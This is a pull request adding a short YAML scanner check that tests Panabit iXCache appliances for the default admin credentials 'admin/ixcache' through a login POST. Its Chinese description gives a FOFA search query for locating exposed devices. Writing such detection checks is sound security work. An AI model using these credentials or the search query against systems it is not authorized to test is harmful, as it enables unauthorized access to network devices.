### PR TITLE
panabit-ixcache-default-password

### DIFF
--- a/pocs/panabit-ixcache-default-password.yml
+++ b/pocs/panabit-ixcache-default-password.yml
@@ -1,0 +1,11 @@
+name: poc-yaml-panabit-ixcache-default-password
+rules:
+  - method: POST
+    path: /login/userverify.cgi
+    body: username=admin&password=ixcache
+    expression: |
+      response.status == 200 && response.body.bcontains(b"URL=/cgi-bin/monitor.cgi")
+detail:
+  author: B1anda0(https://github.com/B1anda0)
+  links:
+    - http://forum.panabit.com/thread-10830-1-1.html


### PR DESCRIPTION

## 本 poc 是检测什么漏洞的
Panabit iXCache 默认账密
## 测试环境
FOFA：app="iXCache"
## 备注
![image](https://user-images.githubusercontent.com/74232513/117464932-b9571280-af83-11eb-813f-a9173070d4d3.png)
